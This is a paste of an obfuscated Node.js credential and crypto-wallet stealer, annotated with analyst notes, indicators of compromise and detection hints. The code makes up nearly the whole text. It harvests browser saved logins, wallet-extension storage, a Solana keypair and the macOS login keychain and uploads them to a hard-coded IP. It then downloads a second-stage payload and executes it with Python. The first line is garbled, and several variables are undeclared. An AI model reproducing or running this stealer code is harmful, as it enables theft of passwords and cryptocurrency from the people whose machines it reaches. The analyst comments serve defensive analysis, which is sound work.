
恶意js代码

a guest
Sep 15th, 2024
  1. mailto:[email protected] _0x153e97 = require('fs');
  2. const _0x5801ce = require('os');
  3. const _0x2b28c9 = require('path');
  4. const _0x50d163 = require('request');
  5. const _0x4a3b2c = require('child_process').exec;
  // Analyst note: host fingerprint gathered once at load. hostname() is later embedded in the
  // `hid` upload field; only the first letter of platform() is tested ('d', 'l', 'w') when the
  // code below picks per-OS paths.
  6. const _0x39c622 = _0x5801ce.hostname();
  7. const _0x2ae0c6 = _0x5801ce.platform();
  8. const _0x349174 = _0x5801ce.homedir();
  9. const _0x414643 = _0x5801ce.tmpdir();
  // Hard-coded plain-HTTP endpoint; the '/uploads', '/pdown' and '/client/...' URLs used below
  // are all built from it. Network IoC: egress to this address and port from a Node process.
  10. const _0x55065c = 'http://95.164.17.24:1224';
  // Expands a leading "~/" to the home directory and "~name" to dirname(home) + '/' + name.
  11. const _0x518ab7 = _0x512eda => _0x512eda.replace(/^~([a-z]+|\/)/, (_0x543a39, _0x13c8d2) => '/' === _0x13c8d2 ? _0x349174 : _0x2b28c9.dirname(_0x349174) + '/' + _0x13c8d2);
  // '10' is sent as the `type` form field and '106' prefixes `hid` and some upload file names;
  // both also appear in the '/client/10/106' URL. Their meaning is not shown in this listing
  // (presumably campaign or build tags — confirm against other samples).
  12. const _0x4d7739 = '10';
  13. const _0x4dfc56 = '106';
  // Existence/permission probe: returns true when fs.accessSync() does not throw for the
  // given path and false when it does. Most directory walks below call it first, so a burst
  // of failed access checks against browser profile paths is itself a behavioural signal.
  14. function _0x1142d3(_0x26632e) {
  15. try {
  16. _0x153e97.accessSync(_0x26632e);
  17. return true;
  18. } catch (_0x21f158) {
  19. return false;
  20. }
  21. }
  // Per-browser directory fragments. The path builders further down use index 0 under
  // '~/AppData/' (+ '/User Data'), index 1 under '~/Library/Application Support/' and
  // index 2 under '~/.config/', i.e. one entry per OS branch.
  // Brave:
  22. const _0x1232d9 = [
  23. 'Local/BraveSoftware/Brave-Browser',
  24. 'BraveSoftware/Brave-Browser',
  25. 'BraveSoftware/Brave-Browser'
  26. ];
  // Chrome:
  27. const _0x151d96 = [
  28. 'Local/Google/Chrome',
  29. 'Google/Chrome',
  30. 'google-chrome'
  31. ];
  // Opera:
  32. const _0x1c1cc8 = [
  33. 'Roaming/Opera Software/Opera Stable',
  34. 'com.operasoftware.Opera',
  35. 'opera'
  36. ];
  // Directory names looked up under each profile's "Local Extension Settings" folder, so these
  // are browser-extension IDs. NOTE(review): several match widely published IDs of
  // cryptocurrency-wallet extensions (the first is the ID commonly listed for MetaMask);
  // verify each against the extension store before relying on a mapping.
  // Useful as a hunting list: any non-browser process reading these folders is suspect.
  37. const _0x275436 = [
  38. 'nkbihfbeogaeaoehlefnkodbefgpgknn',
  39. 'ejbalbakoplchlghecdalmeeeajnimhm',
  40. 'fhbohimaelbohpjbbldcngcnapndodjp',
  41. 'hnfanknocfeofbddgcijnmhnfnkdnaad',
  42. 'ibnejdfjmmkpcnlpebklmnkoeoihofec',
  43. 'bfnaelmomeimhlpmgjnjophhpkkoljpa',
  44. 'aeachknmefphepccionboohckonoeemg',
  45. 'hifafgmccdpekplomjjkcfgodnhcellj',
  46. 'jblndlipeogpafnldhgmapagcccfchpi',
  47. 'acmacodkjbdgmoleebolmdjonilkdbch',
  48. 'dlcobpjiigpikoobohmabehhmhfoodbb',
  49. 'aholpfdialjgjfhomihkjbmgjidlcdno'
  50. ];
  // Analyst note: walks one Chromium-style "User Data" directory and queues the storage of the
  // listed extensions for upload.
  //   _0x420236  base directory to scan (returns [] when empty or not accessible)
  //   _0x3d29b1  browser tag placed in each upload file name (defaults to '')
  //   _0x5b6a41  when truthy, ~/.config/solana/id.json is queued as well
  //   _0x461e07  timestamp passed through to the uploader as `uts`
  // Returns the array of { value: ReadStream, options } entries it handed to _0x4c9bba.
  // NOTE(review): _0x358540 and _0x2c5125 are never declared in this listing; the paste looks
  // like partially deobfuscated output, so read it as a specimen rather than as runnable code.
  // Detection: a non-browser process enumerating "Local Extension Settings" across profiles.
  51. const _0x179256 = async (_0x420236, _0x3d29b1, _0x5b6a41, _0x461e07) => {
  52. let _0x496d98;
  53. if (!_0x420236 || '' === _0x420236)
  54. return [];
  55. try {
  56. if (!_0x1142d3(_0x420236))
  57. return [];
  58. } catch (_0x1f024e) {
  59. return [];
  60. }
  61. _0x3d29b1 || (_0x3d29b1 = '');
  62. let _0x55e519 = [];
  // Profiles probed: 'Default' (index 0) and 'Profile 1' .. 'Profile 199'.
  63. for (let _0x4293f0 = 0; _0x4293f0 < 200; _0x4293f0++) {
  64. const _0x50fbe9 = _0x420236 + '/' + (0 === _0x4293f0 ? 'Default' : 'Profile ' + _0x4293f0) + '/Local Extension Settings';
  65. for (let _0x38faa0 = 0; _0x38faa0 < _0x275436.length; _0x38faa0++) {
  66. let _0x4a10a4 = _0x50fbe9 + '/' + _0x275436[_0x38faa0];
  67. if (_0x1142d3(_0x4a10a4)) {
  68. let _0x134608 = [];
  69. try {
  70. _0x134608 = _0x153e97.readdirSync(_0x4a10a4);
  71. } catch (_0x36e276) {
  72. _0x134608 = [];
  73. }
  74. _0x134608.forEach(async _0x560152 => {
  75. let _0x19df4a = _0x2b28c9.join(_0x4a10a4, _0x560152);
  76. try {
  // Upload name: '106_' + browser tag + profile index + '_' + extension ID + '_' + file name.
  77. _0x358540.filename = _0x4dfc56 + '_' + _0x3d29b1 + _0x4293f0 + '_' + _0x275436[_0x38faa0] + '_' + _0x560152;
  // Only files whose path contains '.log' or '.ldb' are queued.
  78. if (_0x19df4a.includes('.log') || _0x19df4a.includes('.ldb')) {
  79. _0x55e519.push({
  80. 'value': _0x153e97.createReadStream(_0x19df4a),
  81. 'options': _0x358540
  82. });
  83. }
  84. } catch (_0x2fafd8) {
  85. }
  86. });
  87. }
  88. }
  89. }
  // Solana CLI keypair file, queued under the name 'solana_id.txt' when the flag is set.
  // Response: if this code ran on a host, treat that keypair as exposed.
  90. if (_0x5b6a41 && (_0x496d98 = _0x349174 + '/.config/solana/id.json', _0x153e97.existsSync(_0x496d98)))
  91. try {
  92. _0x2c5125.filename = 'solana_id.txt';
  93. _0x55e519.push({
  94. 'value': _0x153e97.createReadStream(_0x496d98),
  95. 'options': _0x2c5125
  96. });
  97. } catch (_0x3264a7) {
  98. }
  99. _0x4c9bba(_0x55e519, _0x461e07);
  100. return _0x55e519;
  101. };
  // Analyst note: Firefox counterpart of the Chromium walk, limited to the Windows profile
  // location '~/AppData/Roaming/Mozilla/Firefox/Profiles'. For profile directories whose path
  // contains '-release' it descends into storage/default/<entry containing 'moz-extension'>/idb/
  // <entry containing '.files'> and queues every non-directory file found there.
  //   _0x4deb16  timestamp passed through to the uploader as `uts`
  // Returns the queued entries, or undefined when the Profiles directory is not accessible
  // (the upload call and the return both sit inside the `if`).
  // NOTE(review): _0x48dfb2, _0x44a64c and _0x1033f6 are not declared in this listing.
  // Detection: a non-browser process reading storage/default/moz-extension*/idb under a profile.
  102. const _0x480bd5 = _0x4deb16 => {
  103. const _0x5d34b1 = _0x518ab7('~/') + '/AppData/Roaming/Mozilla/Firefox/Profiles';
  104. let _0x111c72 = [];
  105. if (_0x1142d3(_0x5d34b1)) {
  106. let _0x3625f7 = [];
  107. try {
  108. _0x3625f7 = _0x153e97.readdirSync(_0x5d34b1);
  109. } catch (_0x1f1115) {
  110. _0x3625f7 = [];
  111. }
  // _0x7759d8 counts profile entries and _0x5a0203 counts '-release' hits; both end up in the
  // upload file name.
  112. let _0x7759d8 = 0;
  113. _0x3625f7.forEach(async _0x2842d3 => {
  114. _0x48dfb2.RMbiC = 'moz-extension';
  115. let _0x30ef48 = _0x2b28c9.join(_0x5d34b1, _0x2842d3);
  116. if (_0x30ef48.includes('-release')) {
  117. let _0x30b510 = _0x2b28c9.join(_0x30ef48, '/storage/default');
  118. let _0x4982d2 = [];
  119. _0x4982d2 = _0x153e97.readdirSync(_0x30b510);
  120. let _0x5a0203 = 0;
  121. _0x4982d2.forEach(async _0x56daf8 => {
  122. if (_0x56daf8.includes(_0x48dfb2.RMbiC)) {
  123. let _0x306740 = _0x2b28c9.join(_0x30b510, _0x56daf8);
  124. _0x306740 = _0x2b28c9.join(_0x306740, 'idb');
  125. let _0x43ad12 = [];
  126. _0x43ad12 = _0x153e97.readdirSync(_0x306740);
  127. _0x43ad12.forEach(async _0x55d331 => {
  // The flag set here is compared with the same literal a few lines below, so the `else`
  // branch there cannot be taken; it reads like obfuscator-inserted filler.
  128. _0x44a64c.ZoevY = 'saaKV';
  129. const _0x12e040 = _0x44a64c;
  130. if (_0x55d331.includes('.files')) {
  131. let _0x514edb = _0x2b28c9.join(_0x306740, _0x55d331);
  132. let _0x258864 = [];
  133. _0x258864 = _0x153e97.readdirSync(_0x514edb), _0x258864.forEach(_0x263353 => {
  134. if (!_0x153e97.statSync(_0x2b28c9.join(_0x514edb, _0x263353)).isDirectory()) {
  135. if ('saaKV' === _0x12e040.ZoevY) {
  136. let _0xe8f438 = _0x2b28c9.join(_0x514edb, _0x263353);
  137. _0x1033f6.filename = _0x7759d8 + '_' + _0x5a0203 + '_' + _0x263353, _0x111c72.push({
  138. 'value': _0x153e97.createReadStream(_0xe8f438),
  139. 'options': _0x1033f6
  140. });
  141. } else {
  142. if (_0x110b8c)
  143. return _0x3ae25b = 0, void _0x17f182();
  144. try {
  145. _0x1e5442 = _0x30ebe7 + 6, _0x1b9e6f.renameSync(_0x11302a, _0x16c5f9), _0x18d5fe(_0x58f816);
  146. } catch (_0x419fb3) {
  147. }
  148. }
  149. }
  150. });
  151. }
  152. });
  153. }
  154. });
  155. _0x5a0203 += 1;
  156. }
  157. _0x7759d8 += 1;
  158. });
  159. _0x4c9bba(_0x111c72, _0x4deb16);
  160. return _0x111c72;
  161. }
  162. };
  // Analyst note: the single exfiltration routine every collector calls.
  //   _0xe07451  array of { value: ReadStream, options: { filename } } entries
  //   _0x1b7ff1  timestamp, sent as `uts`
  // Form fields: type = '10', hid = '106_' + hostname, uts, multi_file = the queued streams.
  // Nothing is sent when the array is empty; otherwise one multipart POST goes to
  // <endpoint>/uploads. The response callback is empty and every error is swallowed, so the
  // calling process shows no sign of the transfer.
  // NOTE(review): _0x43625c, _0x20b054 and _0x4fdebb are not declared in this listing.
  // Detection: HTTP POST to '/uploads' on port 1224 carrying `hid`, `uts` and `multi_file` parts.
  163. const _0x4c9bba = (_0xe07451, _0x1b7ff1) => {
  164. _0x43625c.htTaB = function (_0x3365ee, _0x2824ae) {
  165. return _0x3365ee > _0x2824ae;
  166. };
  167. _0x20b054.type = _0x4d7739;
  168. _0x20b054.hid = _0x4dfc56 + '_' + _0x39c622;
  169. _0x20b054.uts = _0x1b7ff1;
  170. _0x20b054.multi_file = _0xe07451;
  171. try {
  172. if (_0x43625c.htTaB(_0xe07451.length, 0)) {
  173. _0x4fdebb.url = _0x55065c + '/uploads';
  174. _0x4fdebb.formData = _0x20b054;
  175. const _0x3df7d2 = _0x4fdebb;
  176. _0x50d163.post(_0x3df7d2, (_0x205d4e, _0x511e72, _0x522bc2) => {
  177. });
  178. }
  179. } catch (_0x5584a2) {
  180. }
  181. };
  // Analyst note: resolves a browser's data directory for the current OS and runs the
  // extension-storage walk on it.
  //   _0x3d22ed  three-entry fragment array: [0] AppData, [1] Library/Application Support, [2] .config
  //   _0x1b631f  numeric browser tag; tag + '_' becomes the upload file-name prefix
  //   _0x1d5db2  timestamp passed through as `uts`
  // Branching is on the first letter of os.platform(): 'd' and 'l' get their own paths and
  // everything else falls through to the '~/AppData/.../User Data' layout.
  // `0 == _0x1b631f` means the Solana keypair file is requested only for browser tag 0.
  182. const _0x113bb7 = async (_0x3d22ed, _0x1b631f, _0x1d5db2) => {
  183. try {
  184. let _0x578130 = '';
  185. _0x578130 = 'd' == _0x2ae0c6[0] ? _0x518ab7('~/') + '/Library/Application Support/' + _0x3d22ed[1] : 'l' == _0x2ae0c6[0] ? _0x518ab7('~/') + '/.config/' + _0x3d22ed[2] : _0x518ab7('~/') + '/AppData/' + _0x3d22ed[0] + '/User Data';
  186. await _0x179256(_0x578130, _0x1b631f + '_', 0 == _0x1b631f, _0x1d5db2);
  187. } catch (_0x10dda6) {
  188. }
  189. };
  // Analyst note: collector for the paths under ~/Library (called only on the 'd' platform
  // branch). It queues, then uploads:
  //   - ~/Library/Keychains/login.keychain, or login.keychain-db when the former is absent,
  //     under the upload name 'logkc-db';
  //   - Chrome "Login Data" per profile, via a staging copy named ld_<n> in the Chrome directory
  //     (upload name 'pld_<n>');
  //   - Brave "Login Data" per profile (upload name 'brld_<n>').
  //   _0x4cc40b  timestamp passed through as `uts`
  // Returns the queued entries.
  // NOTE(review): _0x52fec3, _0x4de460, _0x3e3e04, _0x382108, _0x17eed3, _0x1a69a2, _0x5e8ee6 and
  // _0x24b358 are not declared in this listing.
  // Host IoC: files named ld_<n> directly under ~/Library/Application Support/Google/Chrome.
  // Response: if this ran, treat the login keychain and browser-saved credentials as exposed.
  190. const _0xa29cb7 = async _0x4cc40b => {
  191. let _0x2a6d0c = [];
  192. let _0x499aff = _0x349174 + '/Library/Keychains/login.keychain';
  193. if (_0x153e97.existsSync(_0x499aff))
  194. try {
  195. _0x52fec3.filename = 'logkc-db';
  196. _0x2a6d0c.push({
  197. 'value': _0x153e97.createReadStream(_0x499aff),
  198. 'options': _0x52fec3
  199. });
  200. } catch (_0x620dce) {
  201. }
  202. else {
  203. if (_0x499aff += '-db', _0x153e97.existsSync(_0x499aff)) {
  204. try {
  205. _0x4de460.filename = 'logkc-db';
  206. _0x2a6d0c.push({
  207. 'value': _0x153e97.createReadStream(_0x499aff),
  208. 'options': _0x4de460
  209. });
  210. } catch (_0x1b6066) {
  211. }
  212. }
  213. }
  // Chrome: for 'Default' and 'Profile 1' .. 'Profile 199', the staging copy ld_<n> is queued
  // when it already exists; otherwise "Login Data" is copied to ld_<n> and the uploader is
  // called from the copy callback.
  214. try {
  215. let _0x1933fe = _0x349174 + '/Library/Application Support/Google/Chrome';
  216. if (_0x1142d3(_0x1933fe))
  217. for (let _0x2285ca = 0; _0x2285ca < 200; _0x2285ca++) {
  218. const _0x2c66c8 = _0x1933fe + '/' + (0 === _0x2285ca ? 'Default' : 'Profile ' + _0x2285ca) + '/Login Data';
  219. try {
  220. if (!_0x1142d3(_0x2c66c8))
  221. continue;
  222. const _0x221499 = _0x1933fe + '/ld_' + _0x2285ca;
  223. _0x3e3e04.filename = 'pld_' + _0x2285ca;
  224. _0x1142d3(_0x221499) ? _0x2a6d0c.push({
  225. 'value': _0x153e97.createReadStream(_0x221499),
  226. 'options': _0x3e3e04
  227. }) : _0x153e97.copyFile(_0x2c66c8, _0x221499, _0x111530 => {
  228. _0x382108.filename = 'pld_' + _0x2285ca;
  229. _0x4c9bba(_0x17eed3, _0x4cc40b);
  230. });
  231. } catch (_0x3bd59c) {
  232. }
  233. }
  234. } catch (_0x5aa8b3) {
  235. }
  // Brave: same profile loop; "Login Data" is queued directly when it is accessible.
  236. try {
  237. let _0xa0d771 = _0x349174 + '/Library/Application Support/BraveSoftware/Brave-Browser';
  238. if (_0x1142d3(_0xa0d771)) {
  239. for (let _0x108329 = 0; _0x108329 < 200; _0x108329++) {
  240. const _0x73412e = _0xa0d771 + '/' + (0 === _0x108329 ? 'Default' : 'Profile ' + _0x108329);
  241. try {
  242. if (!_0x1142d3(_0x73412e))
  243. continue;
  244. const _0x3f0e2e = _0x73412e + '/Login Data';
  245. _0x1a69a2.filename = 'brld_' + _0x108329;
  246. _0x1142d3(_0x3f0e2e) ? _0x2a6d0c.push({
  247. 'value': _0x153e97.createReadStream(_0x3f0e2e),
  248. 'options': _0x1a69a2
  249. }) : _0x153e97.copyFile(_0x73412e, _0x3f0e2e, _0x1bb611 => {
  250. _0x5e8ee6.filename = 'brld_' + _0x108329;
  251. _0x4c9bba(_0x24b358, _0x4cc40b);
  252. });
  253. } catch (_0x33069e) {
  254. }
  255. }
  256. }
  257. } catch (_0x51b57d) {
  258. }
  259. _0x4c9bba(_0x2a6d0c, _0x4cc40b);
  260. return _0x2a6d0c;
  261. };
  // Analyst note: saved-login collector used on every platform except 'd'. For one browser it
  // queues "<data dir>/Local State" (upload name '<tag>_lst') and each accessible profile's
  // "Login Data" (upload name '<tag>_<profile index>_uld'), then uploads them.
  //   _0x337ef1  three-entry fragment array: [0] AppData, [1] Library/Application Support, [2] .config
  //   _0x30fbea  numeric browser tag used in the upload names
  //   _0x321c3a  timestamp passed through as `uts`
  // Returns the queued entries.
  // NOTE(review): Chromium keeps saved logins in "Login Data" and key material for them in
  // "Local State", which is presumably why the two are taken together — confirm per browser.
  // NOTE(review): _0x29de3e, _0x540d33 and _0x4d3b6e are not declared in this listing.
  // Detection: a non-browser process opening both "Local State" and "Login Data".
  262. const _0x4cd284 = async (_0x337ef1, _0x30fbea, _0x321c3a) => {
  263. _0x29de3e.akeQX = function (_0x58454e, _0x174488) {
  264. return _0x58454e == _0x174488;
  265. };
  266. _0x29de3e.oeCDM = 'Default';
  267. const _0x46eb64 = _0x29de3e;
  268. let _0x4abead = [];
  269. let _0x52f98e = '';
  // Same OS-dependent path selection as _0x113bb7, routed through the akeQX equality helper.
  270. _0x52f98e = _0x46eb64.akeQX('d', _0x2ae0c6[0]) ? _0x518ab7('~/') + '/Library/Application Support/' + _0x337ef1[1] : _0x46eb64.akeQX('l', _0x2ae0c6[0]) ? _0x518ab7('~/') + '/.config/' + _0x337ef1[2] : _0x518ab7('~/') + '/AppData/' + _0x337ef1[0] + '/User Data';
  271. let _0x5a6a6a = _0x52f98e + '/Local State';
  272. if (_0x153e97.existsSync(_0x5a6a6a))
  273. try {
  274. _0x540d33.filename = _0x30fbea + '_lst';
  275. _0x4abead.push({
  276. 'value': _0x153e97.createReadStream(_0x5a6a6a),
  277. 'options': _0x540d33
  278. });
  279. } catch (_0x38f090) {
  280. }
  281. try {
  282. if (_0x1142d3(_0x52f98e))
  283. for (let _0x40ae5d = 0; _0x40ae5d < 200; _0x40ae5d++) {
  284. const _0x1b4ce1 = _0x52f98e + '/' + (0 === _0x40ae5d ? _0x46eb64.oeCDM : 'Profile ' + _0x40ae5d);
  285. try {
  286. if (!_0x1142d3(_0x1b4ce1))
  287. continue;
  288. const _0x41a087 = _0x1b4ce1 + '/Login Data';
  289. if (!_0x1142d3(_0x41a087))
  290. continue;
  291. _0x4d3b6e.filename = _0x30fbea + '_' + _0x40ae5d + '_uld';
  292. _0x4abead.push({
  293. 'value': _0x153e97.createReadStream(_0x41a087),
  294. 'options': _0x4d3b6e
  295. });
  296. } catch (_0x521dea) {
  297. }
  298. }
  299. } catch (_0x4dff51) {
  300. }
  301. _0x4c9bba(_0x4abead, _0x321c3a);
  302. return _0x4abead;
  303. };
  // Size constant for the downloaded archive: the download routine below treats the file as
  // complete once its size reaches this value + 6 bytes.
  304. const _0x83c819 = 51476590;
  // Download progress tracker: holds the last observed size of the partial file, or 0 after a reset.
  305. let _0x30d7dc = 0;
  // Analyst note: unpacks the downloaded archive into the user's home directory by shelling
  // out to `tar -xf <archive> -C <home>`, deletes the archive whether or not extraction
  // succeeded, and on success continues with _0x24997f (the second-stage launcher).
  //   _0x2f9695  path of the archive to extract
  // Detection: a Node process spawning `tar -xf ... -C` with the home directory as target,
  // followed by deletion of the archive from the temp directory.
  306. const _0x3ea08d = async _0x2f9695 => {
  307. _0x4a3b2c('tar -xf ' + _0x2f9695 + ' -C ' + _0x349174, (_0x169a09, _0x301f3c, _0x43b713) => {
  308. if (_0x169a09) {
  309. _0x153e97.rmSync(_0x2f9695);
  310. return void (_0x30d7dc = 0);
  311. }
  312. _0x153e97.rmSync(_0x2f9695);
  313. _0x24997f();
  314. });
  315. };
  // Analyst note: fetches an archive from <endpoint>/pdown into the temp directory and hands
  // it to the extractor. The backslash paths and the only non-retry caller (the 'w' branch of
  // _0x24997f) indicate this is the Windows path.
  //   <tmp>\p.zi   partial/finished download written by curl
  //   <tmp>\p2.zip name the file is given just before extraction
  // Flow: nothing happens once the tracker has reached the expected size. If p.zi already
  // exists, its size decides: large enough -> rename and extract; still growing -> remember
  // the size and retry later; not growing -> delete, reset and retry later. If p.zi does not
  // exist, `curl -Lo` is spawned, with a retry on error.
  // NOTE(review): _0x33cf5b is not declared in this listing. The archive presumably supplies
  // the '.pyp\python.exe' that _0x24997f checks for; that cannot be verified from here.
  // Detection: node spawning `curl -Lo "<tmp>\p.zi" "http://.../pdown"`; p.zi / p2.zip in temp.
  316. const _0x1a2cec = () => {
  317. _0x33cf5b.dwcpv = function (_0x543095, _0x196bba) {
  318. return _0x543095 + _0x196bba;
  319. };
  320. _0x33cf5b.hhADP = function (_0x4aeb76, _0x2bbd11) {
  321. return _0x4aeb76 >= _0x2bbd11;
  322. };
  323. const _0x12f865 = _0x33cf5b;
  324. const _0x14524e = _0x55065c + '/pdown';
  325. const _0x5765fd = _0x414643 + '\\p.zi';
  326. const _0x1c020d = _0x414643 + '\\p2.zip';
  327. if (_0x30d7dc >= _0x12f865.dwcpv(_0x83c819, 6))
  328. return;
  329. if (_0x153e97.existsSync(_0x5765fd))
  330. try {
  331. var _0x382278 = _0x153e97.statSync(_0x5765fd);
  332. _0x12f865.hhADP(_0x382278.size, _0x83c819 + 6) ? (_0x30d7dc = _0x382278.size, _0x153e97.rename(_0x5765fd, _0x1c020d, _0x542bf8 => {
  333. if (_0x542bf8)
  334. throw _0x542bf8;
  335. _0x3ea08d(_0x1c020d);
  336. })) : (_0x30d7dc < _0x382278.size ? _0x30d7dc = _0x382278.size : (_0x153e97.rmSync(_0x5765fd), _0x30d7dc = 0), _0x1c1ddd());
  337. } catch (_0x441510) {
  338. }
  339. else
  340. _0x4a3b2c('curl -Lo "' + _0x5765fd + '" "' + _0x14524e + '"', (_0x245de9, _0x5e0ce1, _0x208b7c) => {
  341. if (_0x245de9) {
  342. _0x30d7dc = 0;
  343. return void _0x1c1ddd();
  344. }
  345. try {
  346. _0x30d7dc = _0x83c819 + 6;
  347. _0x153e97.renameSync(_0x5765fd, _0x1c020d);
  348. _0x3ea08d(_0x1c020d);
  349. } catch (_0x5eaf99) {
  350. }
  351. });
  352. };
  // Retry timer: re-runs the archive download routine (_0x1a2cec) after 20 seconds. Together
  // with the size checks there, this yields a repeating 20-second poll while a download is
  // incomplete — a periodic pattern that is visible in process and network telemetry.
  353. function _0x1c1ddd() {
  354. setTimeout(() => {
  355. _0x1a2cec();
  356. }, 20000);
  357. }
  // Analyst note: second-stage launcher. It downloads <endpoint>/client/10/106, writes the
  // response body to <home>/.npl and runs that file with a Python interpreter, so whatever the
  // server returns is executed on the host.
  //   'w' platform: uses <home>\.pyp\python.exe when present; otherwise it starts the archive
  //                 download (_0x1a2cec) instead.
  //   other platforms: runs `python3 "<home>/.npl"`.
  // The Promise's resolve/reject callbacks are never called in the visible code, so awaiting
  // this function would not complete; the callers in this listing do not await it.
  // Host IoCs: <home>/.npl, <home>\.pyp\python.exe.
  // Detection: python / python3 started by a Node process with a '.npl' file in the home
  // directory as its argument; HTTP GET to '/client/10/106' on the endpoint above.
  358. const _0x24997f = async () => await new Promise((_0x49da6c, _0xb70373) => {
  359. if ('w' == _0x2ae0c6[0])
  360. _0x153e97.existsSync(_0x349174 + '\\.pyp\\python.exe') ? (() => {
  361. const _0x4fa76f = _0x55065c + '/client/' + _0x4d7739 + '/' + _0x4dfc56;
  362. const _0x3f680a = _0x349174 + '/.npl';
  363. const _0x37ec0f = '"' + _0x349174 + '\\.pyp\\python.exe" "' + _0x3f680a + '"';
  // Any earlier copy of .npl is removed before the fresh download is written.
  364. try {
  365. _0x153e97.rmSync(_0x3f680a);
  366. } catch (_0x3c30f7) {
  367. }
  368. _0x50d163.get(_0x4fa76f, (_0x176bab, _0x343331, _0xe2c939) => {
  369. if (!_0x176bab)
  370. try {
  371. _0x153e97.writeFileSync(_0x3f680a, _0xe2c939);
  372. _0x4a3b2c(_0x37ec0f, (_0x33a2cd, _0x4850e3, _0x147978) => {
  373. });
  374. } catch (_0x2fea4e) {
  375. }
  376. });
  377. })() : _0x1a2cec();
  378. else
  379. (() => {
  380. _0x50d163.get(_0x55065c + '/client/' + _0x4d7739 + '/' + _0x4dfc56, (_0x336f68, _0x385264, _0x53682d) => {
  381. _0x336f68 || (_0x153e97.writeFileSync(_0x349174 + '/.npl', _0x53682d), _0x4a3b2c('python3 "' + _0x349174 + '/.npl"', (_0x7c798f, _0x4027e7, _0x537b65) => {
  382. }));
  383. });
  384. })();
  385. });
  // Tick counter read by the setInterval at the end of the listing.
  386. var _0x2cf641 = 0;
  // Analyst note: one full collection pass. A single Unix timestamp (seconds) is taken and
  // passed to every collector as `uts`, so all uploads of one pass share it. Order:
  //   1. extension storage for Chrome (tag 0), Brave (tag 1), Opera (tag 2);
  //   2. Firefox extension storage;
  //   3. on the 'w' platform, the same extension walk over the Edge "User Data" dir (tag '3_');
  //   4. on the 'd' platform the ~/Library collector, otherwise "Local State" + "Login Data"
  //      for Chrome, Brave and Opera;
  //   5. the second-stage launcher.
  // All errors are swallowed, so the pass never surfaces a failure to the host application.
  387. const _0x285d2b = async () => {
  388. try {
  389. const _0x200277 = Math.round(new Date().getTime() / 1000);
  390. await (async () => {
  391. try {
  392. await _0x113bb7(_0x151d96, 0, _0x200277);
  393. await _0x113bb7(_0x1232d9, 1, _0x200277);
  394. await _0x113bb7(_0x1c1cc8, 2, _0x200277);
  395. _0x480bd5(_0x200277);
  396. if ('w' == _0x2ae0c6[0]) {
  397. await _0x179256(_0x518ab7('~/') + '/AppData/Local/Microsoft/Edge/User Data', '3_', false, _0x200277);
  398. }
  399. 'd' == _0x2ae0c6[0] ? await _0xa29cb7(_0x200277) : (await _0x4cd284(_0x151d96, 0, _0x200277), await _0x4cd284(_0x1232d9, 1, _0x200277), await _0x4cd284(_0x1c1cc8, 2, _0x200277));
  400. } catch (_0x11074c) {
  401. }
  402. })();
  403. _0x24997f();
  404. } catch (_0x153a9a) {
  405. }
  406. };
  // Analyst note: entry point; everything runs as a side effect of loading this file.
  // A collection pass and the second-stage launcher start immediately. The 90-second interval
  // then runs one more collection pass on its first tick and clears itself on the second, so
  // the visible code performs two passes about 90 seconds apart.
  // Response: if this file was loaded on a host (for example through require() of a package
  // that contains it), treat browser-saved logins, the listed extensions' storage, the Solana
  // keypair file and, on macOS, the login keychain as exposed; rotate them from a clean machine
  // and look for the .npl / .pyp artefacts and the network endpoint named above.
  407. _0x285d2b();
  408. _0x24997f();
  409. let _0x5d4cfa = setInterval(() => {
  410. (_0x2cf641 += 1) < 2 ? _0x285d2b() : clearInterval(_0x5d4cfa);
  411. }, 90000);